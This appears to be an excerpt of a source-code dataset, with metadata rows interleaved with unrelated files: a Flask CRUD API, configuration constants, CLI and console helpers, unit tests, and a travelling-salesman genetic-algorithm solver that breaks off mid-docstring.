| 29.563107 | 98 | 0.691297 | 757 | 6,090 | 5.108322 | 0.110964 | 0.083786 | 0.074476 | 0.086889 | 0.670028 | 0.642358 | 0.559348 | 0.51849 | 0.468063 | 0.399535 | 0 | 0.009165 | 0.229557 | 6,090 | 205 | 99 | 29.707317 | 0.815004 | 0 | 0 | 0.52907 | 0 | 0 | 0.091133 | 0.06798 | 0 | 0 | 0 | 0 | 0.087209 | 1 | 0.098837 | false | 0 | 0.040698 | 0 | 0.145349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd04b70e5cd39ca29b574b5353e8f0319f41223 | 2,325 | py | Python | app.py | laurohen/api-flask-mysql | 3660d8828203476ea87b2580ed4b0508c0ea3af6 | [
"MIT"
] | null | null | null | app.py | laurohen/api-flask-mysql | 3660d8828203476ea87b2580ed4b0508c0ea3af6 | [
"MIT"
] | null | null | null | app.py | laurohen/api-flask-mysql | 3660d8828203476ea87b2580ed4b0508c0ea3af6 | [
"MIT"
] | null | null | null | from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
from marshmallow import fields
from marshmallow_sqlalchemy import ModelSchema
app = Flask(__name__)
# NOTE(review): the URI placeholder embeds credentials inline — load them from
# environment variables or a config file in real deployments.
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://username:password@host:port/database-name'
db = SQLAlchemy(app)
# Model
class User(db.Model):
    """SQLAlchemy model for one row of the ``users`` table."""
    __tablename__ = "users"

    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20))

    def __init__(self, username):
        self.username = username

    def __repr__(self):
        return f"{self.id}"

    def create(self):
        """Persist this instance in the current session and return it."""
        db.session.add(self)
        db.session.commit()
        return self
# Create tables for all declared models (no-op for tables that already exist).
db.create_all()

class UserSchema(ModelSchema):
    """Marshmallow schema for serializing/deserializing ``User`` rows.

    NOTE(review): ``ModelSchema`` is removed in modern marshmallow-sqlalchemy
    (replaced by ``SQLAlchemyAutoSchema``) — confirm the pinned versions.
    """
    class Meta(ModelSchema.Meta):
        model = User
        sqla_session = db.session
    # id is generated by the database, so it is output-only
    id = fields.Number(dump_only=True)
    username = fields.String(required=True)
@app.route('/api/v1/username', methods=['GET'])
def index():
    """Return every stored user as a JSON list."""
    all_users = User.query.all()
    serialized = UserSchema(many=True).dump(all_users)
    return make_response(jsonify({"list users ": serialized}))
@app.route('/api/v1/username/<id>', methods=['GET'])
def get_user_by_id(id):
    """Return a single user looked up by primary key."""
    # NOTE(review): an unknown id serializes to {"user ": {}} rather than a
    # 404 — confirm this is the intended API behavior.
    record = User.query.get(id)
    serialized = UserSchema().dump(record)
    return make_response(jsonify({"user ": serialized}))
@app.route('/api/v1/username/<id>', methods=['PUT'])
def update_user_by_id(id):
    """Update a user's username.

    Returns the updated user as JSON, or 404 when the id does not exist
    (previously an unknown id raised AttributeError and surfaced as HTTP 500).
    """
    data = request.get_json()
    get_user = User.query.get(id)
    if get_user is None:
        return make_response(jsonify({"error": "user not found"}), 404)
    if data.get('username'):
        get_user.username = data['username']
    db.session.add(get_user)
    db.session.commit()
    user_schema = UserSchema(only=['id', 'username'])
    user = user_schema.dump(get_user)
    return make_response(jsonify({"user ": user}))
@app.route('/api/v1/username/<id>', methods=['DELETE'])
def delete_user_by_id(id):
    """Delete a user by id: 204 on success, 404 when the id does not exist.

    (Previously an unknown id raised AttributeError and surfaced as HTTP 500.)
    """
    get_user = User.query.get(id)
    if get_user is None:
        return make_response("", 404)
    db.session.delete(get_user)
    db.session.commit()
    return make_response("", 204)
@app.route('/api/v1/username', methods=['POST'])
def create_todo():
    """Create a user from the JSON request body.  (Function name is historical.)"""
    payload = request.get_json()
    schema = UserSchema()
    new_user = schema.load(payload)
    result = schema.dump(new_user.create())
    return make_response(jsonify({"user ": result}), 200)
if __name__ == "__main__":
app.run(debug=True) | 26.420455 | 99 | 0.67828 | 315 | 2,325 | 4.787302 | 0.253968 | 0.059682 | 0.036472 | 0.043103 | 0.312997 | 0.264589 | 0.177719 | 0.157825 | 0.157825 | 0.157825 | 0 | 0.00676 | 0.172903 | 2,325 | 88 | 100 | 26.420455 | 0.777431 | 0.002151 | 0 | 0.21875 | 0 | 0 | 0.115567 | 0.061665 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.015625 | 0.0625 | 0.015625 | 0.421875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd196b146e9b5ea426e42cd1a578fe228ee3eac | 647 | py | Python | inspector/checks/constants.py | yoyowallet/inspector | a6ee3328a4dcf49b0e5b62d23195ed44f515a705 | [
"Apache-2.0"
] | 7 | 2019-03-03T14:47:47.000Z | 2020-10-31T00:26:52.000Z | inspector/checks/constants.py | yoyowallet/inspector | a6ee3328a4dcf49b0e5b62d23195ed44f515a705 | [
"Apache-2.0"
] | 2 | 2019-03-06T19:35:41.000Z | 2020-11-04T11:57:18.000Z | inspector/checks/constants.py | yoyowallet/inspector | a6ee3328a4dcf49b0e5b62d23195ed44f515a705 | [
"Apache-2.0"
] | 3 | 2019-03-03T16:29:44.000Z | 2020-10-31T00:47:01.000Z | from model_utils import Choices
# Comparison operators that can be applied between a check's two sides.
RELATIONS = Choices(
    (0, 'eq', '='),
    (1, 'ne', '!='),
    (2, 'gt', '>'),
    (3, 'lt', '<'),
    (4, 'ge', '>='),
    (5, 'le', '<='),
)

# Lifecycle states of a check execution.
STATUSES = Choices(
    ('NEW', 'New'),
    ('RUNNING', 'Running'),
    ('FINISHED', 'Finished'),
    ('ERROR', 'Error')
)

# Outcome of a finished check execution.
RESULTS = Choices(
    ('SUCCESS', 'Success'),
    ('WARNING', 'Warning'),
    ('FAILED', 'Failed')
)

# Kinds of values/expressions a check side can hold.
CHECK_TYPES = Choices(
    (0, 'SQL_QUERY', 'SQL query'),
    (1, 'SQL_EXPRESSION', 'SQL expression'),
    (2, 'NUMBER', 'Number'),
    (3, 'STRING', 'String'),
    (4, 'DATE', 'Date'),
    (5, 'PYTHON_EXPRESSION', 'Python expression'),
)
| 19.029412 | 50 | 0.479134 | 64 | 647 | 4.765625 | 0.5625 | 0.052459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024341 | 0.238022 | 647 | 33 | 51 | 19.606061 | 0.59432 | 0 | 0 | 0 | 0 | 0 | 0.338485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd4a079399c71c1620bc498d4b73a09c55a55ad | 661 | bzl | Python | versions.bzl | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 16 | 2021-07-14T23:32:31.000Z | 2022-03-24T16:25:15.000Z | versions.bzl | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-20T20:39:47.000Z | 2021-09-16T20:57:59.000Z | versions.bzl | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-15T19:38:35.000Z | 2022-01-31T19:24:56.000Z | # Product versions live here (and only here). They should be bumped at every
# release.
#
# NOTE: This is parsable by both bazel and sh. Do not add arbitrary
# text here.
#
# Versions *must* adhere to semantic versioning rules. See http://semver.org/
#
# Don't forget to also update relevant docs and README.txt files. ;)
# This is the public-facing program release version of biograph and the SDK
BIOGRAPH_VERSION="7.1.2-dev"
# Use this version of the ML model from archive.spiralgenetics.com.
BIOGRAPH_MODEL_VERSION="7.1.0"
# SEQSET is the biograph file format version
SEQSET_VERSION="2.0.0"
# SpEC file format + program version
SPEC_VERSION="1.3.2-dev"
| 30.045455 | 77 | 0.750378 | 111 | 661 | 4.423423 | 0.63964 | 0.02444 | 0.03666 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021583 | 0.15885 | 661 | 21 | 78 | 31.47619 | 0.861511 | 0.789713 | 0 | 0 | 0 | 0 | 0.224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfd7afdce647ef41b496ff6aa9e1fd9678d81b54 | 542 | py | Python | Lesson 02.gf/intermediate_expressions.py | gfoo003/programming-together | 225e0a2255dd8da1f1ef32d2a88deea27c050f10 | [
"MIT"
] | null | null | null | Lesson 02.gf/intermediate_expressions.py | gfoo003/programming-together | 225e0a2255dd8da1f1ef32d2a88deea27c050f10 | [
"MIT"
] | null | null | null | Lesson 02.gf/intermediate_expressions.py | gfoo003/programming-together | 225e0a2255dd8da1f1ef32d2a88deea27c050f10 | [
"MIT"
] | null | null | null | name=input("hi, what's your name?")
age=input("how old are you?")
print("your name is ", name, "and you are ", age )
# int(x) = change string to integer
# str(x)= change integer to string
# to check type, print(type"x")
# you can only print "results" of the same type, unless doing string interpolation.
# difference between string interpolation and comma is that the variable cannot be placed in the middle
number=1
name="grace"
#assigning string "grace" into variable "name"
result=str(number)+" "+name
print(result)
print(number,name)
| 30.111111 | 103 | 0.726937 | 88 | 542 | 4.477273 | 0.545455 | 0.040609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002183 | 0.154982 | 542 | 17 | 104 | 31.882353 | 0.858079 | 0.599631 | 0 | 0 | 0 | 0 | 0.326923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
449e221a47922edae38daf290f2bdc462fa87ed3 | 446 | py | Python | dueros/directive/Pay/Buy.py | Mryan2005/bot-sdk-python | f961aedf141e966badd5cd577ad8913dd9733998 | [
"Apache-2.0"
] | 70 | 2018-01-04T06:47:58.000Z | 2021-07-28T03:08:48.000Z | dueros/directive/Pay/Buy.py | mlzboy/bot-sdk-python | 664c90ec6d0abbb0844c030cd3114693a96b12ab | [
"Apache-2.0"
] | 16 | 2018-01-02T15:25:23.000Z | 2020-03-14T07:25:44.000Z | dueros/directive/Pay/Buy.py | mlzboy/bot-sdk-python | 664c90ec6d0abbb0844c030cd3114693a96b12ab | [
"Apache-2.0"
] | 32 | 2018-01-09T10:19:46.000Z | 2021-05-06T08:35:52.000Z | #!/usr/bin/env python3
# -*- encoding=utf-8 -*-
# description:
# author:jack
# create_time: 2019-07-04
from dueros.directive.BaseDirective import BaseDirective
class Buy(BaseDirective):
    """
    Directive class that generates a Buy instruction
    ('Connections.SendRequest.Buy').
    """

    def __init__(self, product_id, token=''):
        # :param product_id: id of the product to purchase
        # :param token: optional token, only attached when non-empty
        super(Buy, self).__init__('Connections.SendRequest.Buy')
        if token:
            self.data['token'] = token
        # assumes BaseDirective.__init__ created self.data['payload'] — TODO confirm
        self.data['payload']['productId'] = product_id
44a2791177029781912dd84d5fb81d78441a1833 | 1,488 | py | Python | server-python3/test/test.py | Aaron-Ming/websocket_terminal | 42c24391d51c275eabf1f879fb312b9a3614f51e | [
"MIT"
] | 40 | 2016-11-20T09:48:27.000Z | 2021-04-02T00:29:14.000Z | server-python3/test/test.py | Aaron-Ming/websocket_terminal | 42c24391d51c275eabf1f879fb312b9a3614f51e | [
"MIT"
] | 6 | 2018-01-07T03:43:22.000Z | 2022-03-21T08:43:33.000Z | server-python3/test/test.py | glensc/websocket_terminal | 42c24391d51c275eabf1f879fb312b9a3614f51e | [
"MIT"
] | 20 | 2016-12-02T06:00:27.000Z | 2021-08-15T11:40:34.000Z | import threading
import sys
import subprocess
import eventlet
import eventlet.tpool
import eventlet.green.subprocess
from eventlet import green
eventlet.monkey_patch()
def consume(stream, pref=b'T> '):
    """Copy ``stream`` to stdout in 1 KiB chunks, prefixing every line with
    ``pref``.  The "CHK ..." prints are debug tracing for this test script."""
    print("CHK consume 1")
    # prefix still owed to the very first chunk only
    p = pref
    while True:
        print("CHK consume 2")
        data = stream.read(1024)
        print("CHK consume 3")
        if not data:
            # EOF: the child closed this stream
            break
        if p:
            data = p + data
            p = None
        # prefix every subsequent line by rewriting the newlines
        sys.stdout.buffer.write(data.replace(b'\n', b'\n' + pref))
        print("CHK consume 4")
        sys.stdout.flush()
    print("CHK consume 5")
def start_daemon_thread(fn):
    """Run ``fn`` on a freshly started daemon thread and return the thread."""
    worker = threading.Thread(target=fn, daemon=True)
    print("CHK start_daemon_thread 1")
    worker.start()
    print("CHK start_daemon_thread 2")
    return worker
def consume_input():
    # Forward interactive stdin lines to the child process's stdin, forever.
    print("CHK consume_input input")
    while True:
        line = input() + '\n'
        print("CHK consume_input line", line)
        proc.stdin.write(bytes(line, 'ascii'))
        proc.stdin.flush()

# Spawn a "cmd" shell (Windows) with fully piped, unbuffered stdio.
proc = green.subprocess.Popen("cmd", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)

def spawn(fn):
    # Experiment switch: thread-based today; eventlet variants kept commented
    # out for comparison.
    print("CHK spawn")
    return start_daemon_thread(fn)
    #return eventlet.spawn(fn)
    #return eventlet.tpool.execute(fn)

# Pump child stdout/stderr concurrently, tagging lines by origin (T>/E>).
thread1 = spawn(lambda: consume(proc.stdout, b"T> "))
thread2 = spawn(lambda: consume(proc.stderr, b"E> "))
print("CHK sleeping")
eventlet.sleep(2)
consume_input()
| 22.208955 | 118 | 0.640457 | 198 | 1,488 | 4.747475 | 0.328283 | 0.093617 | 0.111702 | 0.040426 | 0.053191 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013169 | 0.234543 | 1,488 | 66 | 119 | 22.545455 | 0.812116 | 0.038978 | 0 | 0.042553 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.148936 | 0 | 0.276596 | 0.234043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44a509e87a818b2445cd5c73173ed6b47ce8470d | 1,591 | py | Python | climatecontrol/cli_utils.py | daviskirk/climatecontrol | f1fed474d649eaf4d75ed5b7cdda333faef4bbd7 | [
"MIT"
] | 19 | 2018-01-19T13:42:18.000Z | 2022-02-27T22:20:39.000Z | climatecontrol/cli_utils.py | daviskirk/climatecontrol | f1fed474d649eaf4d75ed5b7cdda333faef4bbd7 | [
"MIT"
] | 27 | 2016-06-01T23:03:48.000Z | 2022-02-27T22:24:36.000Z | climatecontrol/cli_utils.py | daviskirk/climatecontrol | f1fed474d649eaf4d75ed5b7cdda333faef4bbd7 | [
"MIT"
] | 2 | 2017-07-10T09:49:55.000Z | 2018-01-10T12:38:34.000Z | """CLI utils for easy command line extras."""
import click
from climatecontrol import core
def click_settings_file_option(
    settings_obj: core.Climate, click_obj=click, option_name="settings", **kw
):
    """Create a ``click`` option decorator that loads settings files.

    The returned decorator adds an eager ``--settings`` / ``-s`` style option
    (names derived from ``option_name``) to a click command.  When the option
    is given, each file path is validated by click and then loaded into
    ``settings_obj`` before the command body runs.

    Args:
        settings_obj: Climate object that receives the loaded settings.
        click_obj: click module (or compatible object) used to build the option.
        option_name: long option name; its first character becomes the short flag.
        **kw: extra keyword arguments forwarded to ``click_obj.option``.
    """

    def _load_settings(ctx, param, value):
        # Eager callback: apply the file(s) before other options are processed.
        if value:
            settings_obj.settings_files = value
            settings_obj.update()

    opts = {
        "help": "Settings file path for loading settings from file.",
        "callback": _load_settings,
        "type": click_obj.Path(exists=True, dir_okay=False, resolve_path=True),
        "expose_value": False,
        "is_eager": True,
        "multiple": True,
    }
    opts.update(kw)
    return click_obj.option(
        "--{}".format(option_name), "-{}".format(option_name[0]), **opts
    )
| 26.081967 | 81 | 0.63105 | 194 | 1,591 | 4.979381 | 0.43299 | 0.062112 | 0.031056 | 0.060041 | 0.144928 | 0.080745 | 0 | 0 | 0 | 0 | 0 | 0.000868 | 0.275927 | 1,591 | 60 | 82 | 26.516667 | 0.837674 | 0.472659 | 0 | 0 | 0 | 0 | 0.086667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44aa2a1d82bec0cc44381f7808cea5fcad7ec790 | 2,888 | py | Python | utils.py | andreloezer/zombie-dice | 0a97f0d14a2c5ada480e416e4a3f3fc1f47f8c30 | [
"MIT"
] | null | null | null | utils.py | andreloezer/zombie-dice | 0a97f0d14a2c5ada480e416e4a3f3fc1f47f8c30 | [
"MIT"
] | null | null | null | utils.py | andreloezer/zombie-dice | 0a97f0d14a2c5ada480e416e4a3f3fc1f47f8c30 | [
"MIT"
] | null | null | null | """Miscellaneous functions goes in here.
"""
from os import system
from config import OS
from strings import UtilsStrings as Strings
def clear_console() -> None:
    """Clear the terminal screen with the right command for the platform."""
    # Windows shells use "cls"; everything else understands "clear".
    system("cls" if OS in ("nt", "dos") else "clear")
def char_input() -> str:
    """Capture and return a single character representing the key pressed.

    :return: Character pressed.
    """
    if OS in ("nt", "dos"):  # Get key on Windows
        import msvcrt
        # note: getwche echoes the typed character to the console
        key = msvcrt.getwche()
    else:  # Get key on UNIX
        # Solution found on:
        # https://www.semicolonworld.com/question/42804/python-read-a-single-character-from-the-user#comment-21
        import sys
        import tty
        import termios
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            # switch the terminal to raw mode so one keypress is readable
            tty.setraw(sys.stdin.fileno())
            key = sys.stdin.read(1)
        finally:
            # always restore the original terminal settings
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
    return key
def int_input(message: str, min_val: int, max_val: int) -> int:
    """Prompt until the user enters an integer within [min_val, max_val].

    :param message: Message prompting the user to enter an integer.
    :param min_val: Minimum valid value for the integer.
    :param max_val: Maximum valid value for the integer.
    :return: Validated integer input.
    """
    while True:
        raw = input(message)
        try:
            # int("") / int("abc") raise ValueError, covering empty input too
            number = int(raw)
        except ValueError:
            print(Strings.int_warning(min_val, max_val))
            continue
        if min_val <= number <= max_val:
            return number
        # out of range: warn and prompt again
        print(Strings.int_warning(min_val, max_val))
def text_input(message: str) -> str:
    """Prompt until a non-empty string is entered.

    :param message: Message prompting the user to enter a string.
    :return: Validated string input.
    """
    while True:
        answer = input(message)
        if not answer:
            print(Strings.str_warning)
            continue
        return answer
def bool_input(message: str) -> bool:
    """Prompt (single keypress) until a truthy or falsy answer is given.

    :param message: Message prompting the user to choose between true or false.
    :return: Boolean choice from the user.
    """
    while True:
        print(message)
        answer = char_input().lower()
        print()
        if answer in Strings.truthy:
            return True
        if answer in Strings.falsy:
            return False
        print(Strings.bool_warning)
def stringify(obj_list: list[object]) -> list[str]:
    """Convert a list of objects into a list of their string representations.

    :param obj_list: List of objects.
    :return: List with ``str(obj)`` for each object, in order.
    """
    # str(obj) is the idiomatic spelling of obj.__str__()
    return [str(obj) for obj in obj_list]
| 27.245283 | 111 | 0.61115 | 354 | 2,888 | 4.912429 | 0.353107 | 0.020127 | 0.025877 | 0.041403 | 0.156412 | 0.117309 | 0.078206 | 0.078206 | 0.054054 | 0 | 0 | 0.003955 | 0.299515 | 2,888 | 105 | 112 | 27.504762 | 0.85566 | 0.345914 | 0 | 0.285714 | 0 | 0 | 0.010129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.125 | 0 | 0.339286 | 0.089286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44ac65411f95028d1ff96429ecd33acb3965c521 | 1,348 | py | Python | tests/test_analyser/test_sniffer_shpr.py | di-unipi-socc/micro-tosca | 5d5c9361b34eeabaed8955ddc62282607672bd81 | [
"MIT"
] | null | null | null | tests/test_analyser/test_sniffer_shpr.py | di-unipi-socc/micro-tosca | 5d5c9361b34eeabaed8955ddc62282607672bd81 | [
"MIT"
] | 3 | 2019-10-02T13:55:39.000Z | 2021-06-01T22:55:20.000Z | tests/test_analyser/test_sniffer_shpr.py | di-unipi-socc/microFreshener-core | 5d5c9361b34eeabaed8955ddc62282607672bd81 | [
"MIT"
] | null | null | null | from unittest import TestCase
from microfreshener.core.importer import YMLImporter
from microfreshener.core.analyser.sniffer import SharedPersistencySmellSniffer
from microfreshener.core.analyser.smell import SharedPersistencySmell
from microfreshener.core.model.groups import Edge
class TestSharedPersitence(TestCase):
    """Tests for SharedPersistencySmellSniffer on data/tests/test_sniffer_shpr.yml.

    NOTE(review): the class name has a typo ("Persitence"); kept as-is since
    renaming would change the test identifier.
    """

    @classmethod
    def setUpClass(self):
        # NOTE(review): ``self`` here is actually the class object
        # (conventionally named ``cls`` in a classmethod).
        file = 'data/tests/test_sniffer_shpr.yml'
        loader = YMLImporter()
        self.micro_model = loader.Import(file)
        self.shprSniffer = SharedPersistencySmellSniffer()

    def test_shpr(self):
        # "db": the smell is reported with three causing links.
        Datastore = self.micro_model["db"]
        smell = self.shprSniffer.snif(Datastore)
        self.assertIsInstance(smell, SharedPersistencySmell)
        self.assertFalse(smell.isEmpty())
        self.assertEqual(len(smell.getLinkCause()), 3)
        self.assertEqual(len(smell.getNodeCause()), 0)

    def test_shpr_database(self):
        # "db1": no smell expected.
        Datastore = self.micro_model["db1"]
        smell = self.shprSniffer.snif(Datastore)
        self.assertTrue(smell.isEmpty())
        self.assertEqual(len(smell.getLinkCause()), 0)
        self.assertEqual(len(smell.getNodeCause()), 0)

    def test_shpr_service_to_database(self):
        # "db2": no smell expected either.
        Datastore = self.micro_model["db2"]
        smell = self.shprSniffer.snif(Datastore)
        self.assertTrue(smell.isEmpty())
44ad4566bf3e052d6f2cd5576c859905edc198bd | 9,068 | py | Python | geneal/applications/tsp/travelling_salesman_problem.py | NeveIsa/geneal | 064b0409912088886bf56fe9a729d74dac92a235 | [
"MIT"
] | 47 | 2020-07-10T14:28:52.000Z | 2022-03-25T17:20:52.000Z | geneal/applications/tsp/travelling_salesman_problem.py | NeveIsa/geneal | 064b0409912088886bf56fe9a729d74dac92a235 | [
"MIT"
] | 10 | 2020-08-08T16:35:40.000Z | 2022-03-08T00:07:19.000Z | geneal/applications/tsp/travelling_salesman_problem.py | NeveIsa/geneal | 064b0409912088886bf56fe9a729d74dac92a235 | [
"MIT"
] | 14 | 2020-08-07T20:49:18.000Z | 2022-03-31T17:55:47.000Z | import random
import time
from functools import reduce
import hashlib
from collections import defaultdict
import numpy as np
from numba import njit
from numba.core import types
from numba.typed import Dict
from geneal.applications.tsp.mutation_strategies import MutationStrategies
from geneal.genetic_algorithms import ContinuousGenAlgSolver
from geneal.utils.exceptions import InvalidInput
# Strategies that "select_any_mutation" may pick from at random.
mutation_options = {"random_swap", "random_inversion", "2-opt"}

# Every strategy name accepted by TravellingSalesmanProblemSolver.__init__.
# NOTE(review): "random_gene_around_nearest_neighbour" is dispatched in
# mutate_population but is not listed here — confirm whether it should be.
allowed_mutations = {
    "2-opt",
    "random_swap",
    "random_inversion",
    "random_gene_nearest_neighbour",
    "worst_gene_random",
    "worst_gene_nearest_neighbour",
    "select_any_mutation",
}
@njit
def fitness_function(individual, edges):
    """
    Implements the logic that calculates the fitness
    measure of an individual. It sums all the costs of going
    from node to node in the tour.

    Compiled with numba's ``@njit``, so only numba-supported constructs are
    used (plain loop, typed-dict lookups).

    :param individual: chromosome of genes representing an individual
    :param edges: dictionary with cost between all nodes
    :return: the fitness of the individual
    """
    total_length = 0
    for i in range(individual.shape[0] - 1):
        total_length += edges[(individual[i], individual[i + 1])]
    # Close the tour: cost of returning from the last city to the first.
    total_length += edges[(individual[0], individual[-1])]
    # Negated so that a shorter tour means a higher (better) fitness.
    return -round(total_length, 2)
def convert_to_typed_dict(G):
    """Convert the edge weights of graph ``G`` into a numba typed Dict.

    The dict maps ``(node_a, node_b)`` int64 tuples to float64 weights so the
    njit-compiled ``fitness_function`` can look them up. Both orientations of
    every edge are inserted, making the lookup direction-independent.
    """
    edges_dict = Dict.empty(
        key_type=types.UniTuple(types.int64, 2), value_type=types.float64
    )
    edges_dict.update({(edge[1], edge[0]): G.edges[edge]["weight"] for edge in G.edges})
    edges_dict.update({(edge[0], edge[1]): G.edges[edge]["weight"] for edge in G.edges})
    return edges_dict
class TravellingSalesmanProblemSolver(MutationStrategies, ContinuousGenAlgSolver):
    """Genetic-algorithm solver for the travelling salesman problem on a graph."""

    def __init__(
        self,
        graph,
        mutation_strategy: str = "2-opt",
        n_searches: int = 1,
        numba_speedup: bool = False,
        *args,
        **kwargs,
    ):
        """
        :param graph: weighted graph with ``.edges``/``.nodes`` access
            (presumably a networkx graph — TODO confirm)
        :param mutation_strategy: one of ``allowed_mutations``
        :param n_searches: number of local searches per mutation
        :param numba_speedup: replace the fitness method with an njit version
        """
        self.check_input(kwargs, graph)
        MutationStrategies.__init__(self, n_searches=n_searches)
        ContinuousGenAlgSolver.__init__(self, n_crossover_points=2, *args, **kwargs)
        if mutation_strategy not in allowed_mutations:
            raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
        if numba_speedup:
            edges_dict = convert_to_typed_dict(graph)
            # Shadow the bound method with an njit-backed closure over the
            # pre-built typed edge dict.
            self.fitness_function = lambda individual: fitness_function(
                individual, edges_dict
            )
        self.G = graph
        self.mutation_strategy = mutation_strategy
        self.fitness_time = 0  # cumulative seconds spent in fitness evaluation
        self.chromosomes = defaultdict(int)  # cache: sha1(chromosome) -> fitness
@staticmethod
def check_input(kwargs, graph):
    """Normalize GA keyword arguments in place for the TSP setting.

    Any user-supplied ``n_crossover_points`` is dropped (OX crossover always
    uses 2, with a notice if a different value was given), and ``n_genes``
    is set to — or clamped at — the number of nodes in the graph.

    :param kwargs: keyword-argument dict, mutated in place
    :param graph: graph whose node count bounds ``n_genes``
    :return: the same (mutated) ``kwargs`` dict
    """
    if kwargs.pop("n_crossover_points", 2) != 2:
        print("Defaulting 'n_crossover_points' to 2")
    n_nodes = len(graph.nodes)
    if "n_genes" not in kwargs:
        kwargs["n_genes"] = n_nodes
    elif kwargs["n_genes"] > n_nodes:
        print(
            f"'n_genes' can't be larger than the nodes in the graph. The number of genes "
            f"will default to {len(graph.nodes)}."
        )
        kwargs["n_genes"] = n_nodes
    return kwargs
def fitness_function(self, individual):
    """
    Implements the logic that calculates the fitness measure of an
    individual: the sum of all edge weights along the tour, including the
    edge that closes it, negated so that shorter tours score higher.
    Results are memoized by the SHA-1 of the chromosome's bytes, and the
    cumulative evaluation time is tracked in ``self.fitness_time``.

    :param individual: chromosome of genes representing an individual
    :return: the fitness of the individual
    """
    started = time.time()
    key = hashlib.sha1(individual).hexdigest()
    if key in self.chromosomes:
        fitness = self.chromosomes[key]
    else:
        tour_length = 0
        for here, there in zip(individual, individual[1:]):
            tour_length += self.G.edges[(here, there)]["weight"]
        # Close the tour back to the starting city.
        tour_length += self.G.edges[(individual[0], individual[-1])]["weight"]
        fitness = -round(tour_length, 2)
        self.chromosomes[key] = fitness
    self.fitness_time += time.time() - started
    return fitness
def initialize_population(self):
    """
    Initializes the population of the problem: a matrix of size
    (pop_size x n_genes) whose rows are independent random permutations of
    the node labels 1..n_genes.

    :return: a numpy array with a randomized initialized population
    """
    base_tour = np.arange(1, self.n_genes + 1)
    shuffled_rows = [np.random.permutation(base_tour) for _ in range(self.pop_size)]
    return np.array(shuffled_rows)
def create_offspring(self, first_parent, sec_parent, crossover_pt, _):
    """
    Creates an offspring from 2 parents. It performs an OX crossover, which
    combines genes from each parent, but maintaining the nodes order of the parents.

